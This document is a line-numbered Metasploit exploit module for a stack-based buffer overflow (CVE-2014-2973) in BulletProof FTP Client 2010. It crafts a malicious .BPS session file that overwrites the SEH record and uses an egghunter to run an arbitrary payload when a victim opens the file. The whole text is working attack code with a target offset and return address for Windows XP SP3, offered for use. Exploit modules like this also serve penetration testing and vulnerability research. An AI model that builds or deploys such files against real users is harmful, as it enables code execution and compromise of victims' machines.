BulletProof FTP Client BPS Buffer Overflow

1. ##
2. # This module requires Metasploit: http://metasploit.com/download
3. # Made By Aluf
4. # Current source: https://github.com/rapid7/metasploit-framework
5. ##
6.  
7. require 'msf/core'
8.  
9. class Metasploit3 < Msf::Exploit::Remote
10.   Rank = NormalRanking
11.  
12.   include Msf::Exploit::FILEFORMAT
13.   include Msf::Exploit::Remote::Seh
14.   include Msf::Exploit::Remote::Egghunter
15.  
16.   def initialize(info = {})
17.     super(update_info(info,
18.       'Name'           => 'BulletProof FTP Client BPS Buffer Overflow',
19.       'Description'    => %q{
20.           This module exploits a stack-based buffer overflow vulnerability in
21.         BulletProof FTP Client 2010, caused by an overly long hostname.
22.         By persuading the victim to open a specially-crafted .BPS file, a
23.         remote attacker could execute arbitrary code on the system or cause
24.         the application to crash. This module has been tested successfully on
25.         Windows XP SP3.
26.       },
27.       'License'        => MSF_LICENSE,
28.       'Author'         =>
29.         [
30.           'Gabor Seljan'
31.         ],
32.       'References'     =>
33.         [
34.           [ 'EDB', '34162' ],
35.           [ 'EDB', '34540' ],
36.           [ 'EDB', '35449' ],
37.           [ 'OSVDB', '109547' ],
38.           [ 'CVE', '2014-2973' ],
39.         ],
40.       'DefaultOptions' =>
41.         {
42.           'ExitFunction' => 'process'
43.         },
44.       'Platform'       => 'win',
45.       'Payload'        =>
46.         {
47.           'BadChars'   => "\x00\x0a\x0d\x1a",
48.           'Space'      => 2000
49.         },
50.       'Targets'        =>
51.         [
52.           [ 'Windows XP SP3',
53.             {
54.               'Offset' => 89,
55.               'Ret'    => 0x74c86a98  # POP EDI # POP ESI # RET [oleacc.dll]
56.             }
57.           ]
58.         ],
59.       'Privileged'     => false,
60.       'DisclosureDate' => 'Jul 24 2014',
61.       'DefaultTarget'  => 0
62.     ))
63.  
64.     register_options(
65.       [
66.         OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
67.       ],
68.     self.class)
69.   end
70.  
71.   def exploit
72.     eggoptions = {
73.       :checksum => true,
74.       :eggtag => 'w00t'
75.     }
76.  
77.     hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
78.  
79.     sploit = "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
80.     sploit << rand_text_alpha(target['Offset'])
81.     sploit << generate_seh_record(target.ret)
82.     sploit << hunter               + "\r\n"  # FTP Server HOST / IP
83.     sploit << rand_text_numeric(5) + "\r\n"  # Port number
84.     sploit << egg                  + "\r\n"  # Login name
85.     sploit << rand_text_alpha(8)   + "\r\n"  # Login password
86.  
87.     # Create the file
88.     print_status("Creating '#{datastore['FILENAME']}' file...")
89.     file_create(sploit)
90.   end
91.  
92. end